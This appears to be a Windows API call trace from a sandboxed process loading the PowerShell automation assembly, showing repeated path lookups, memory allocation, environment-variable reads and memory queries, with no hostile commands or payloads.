	[0228.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.870] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0228.870] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.908] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.671] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0242.736] VirtualQuery (in: lpAddress=0x13b900, lpBuffer=0x13c7c0, dwLength=0x30 | out: lpBuffer=0x13c7c0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0243.396] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0243.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.396] CoTaskMemFree (pv=0x215590) 
	[0243.404] VirtualQuery (in: lpAddress=0x13b900, lpBuffer=0x13c7c0, dwLength=0x30 | out: lpBuffer=0x13c7c0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0243.419] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0243.420] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.420] CoTaskMemFree (pv=0x215590) 
	[0243.423] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0243.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.423] CoTaskMemFree (pv=0x215590) 
	[0243.925] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0243.925] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.925] CoTaskMemFree (pv=0x215590) 
	[0243.932] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0243.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.932] CoTaskMemFree (pv=0x215590) 
	[0243.937] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0243.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.937] CoTaskMemFree (pv=0x215590) 
	[0243.939] CoTaskMemAlloc (cb=0x104) returned 0x215590
	[0243.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0243.939] CoTaskMemFree (pv=0x215590) 
	[0243.944] VirtualQuery (in: lpAddress=0x13b900, lpBuffer=0x13c7c0, dwLength=0x30 | out: lpBuffer=0x13c7c0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0243.949] VirtualQuery (in: lpAddress=0x13b900, lpBuffer=0x13c7c0, dwLength=0x30 | out: lpBuffer=0x13c7c0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0249.769] VirtualQuery (in: lpAddress=0x13b900, lpBuffer=0x13c7c0, dwLength=0x30 | out: lpBuffer=0x13c7c0*(BaseAddress=0x13b000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
